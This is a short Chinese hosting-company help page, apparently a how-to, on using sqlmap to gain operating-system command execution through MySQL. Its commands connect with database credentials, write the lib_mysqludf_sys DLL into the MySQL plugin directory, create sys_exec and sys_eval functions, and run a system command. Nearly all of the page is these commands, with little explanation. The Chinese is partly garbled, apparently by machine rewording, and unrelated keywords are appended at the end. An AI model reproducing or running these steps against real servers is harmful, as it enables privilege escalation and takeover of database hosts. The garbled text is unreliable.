梦飞数据中心 > 帮助中心 > 网络技术 > 利用sqlmap通过mysql提权的能力

利用sqlmap通过mysql提权的能力

 1.毗连mysql数据打开一个交互shell:

sqlmap.py -d mysql://root:[email protected]:3306/test --sql-shell select @@version; select @@plugin_dir; d:\wamp2.5\bin\mysql\mysql5.6.17\lib\plugin\   2.操作sqlmap上传lib_mysqludf_sys到MySQL插件目次: sqlmap.py -d mysql://root:[email protected]:3306/test --file-write=d:/tmp/lib_mysqludf_sys.dll --file-dest=d:\wamp2.5\bin\mysql\mysql5.6.17\lib\plugin\lib_mysqludf_sys.dll CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.dll' CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll' select sys_eval('ver');,directadmin安装 directadmin汉化 (责任编辑:蒋坤)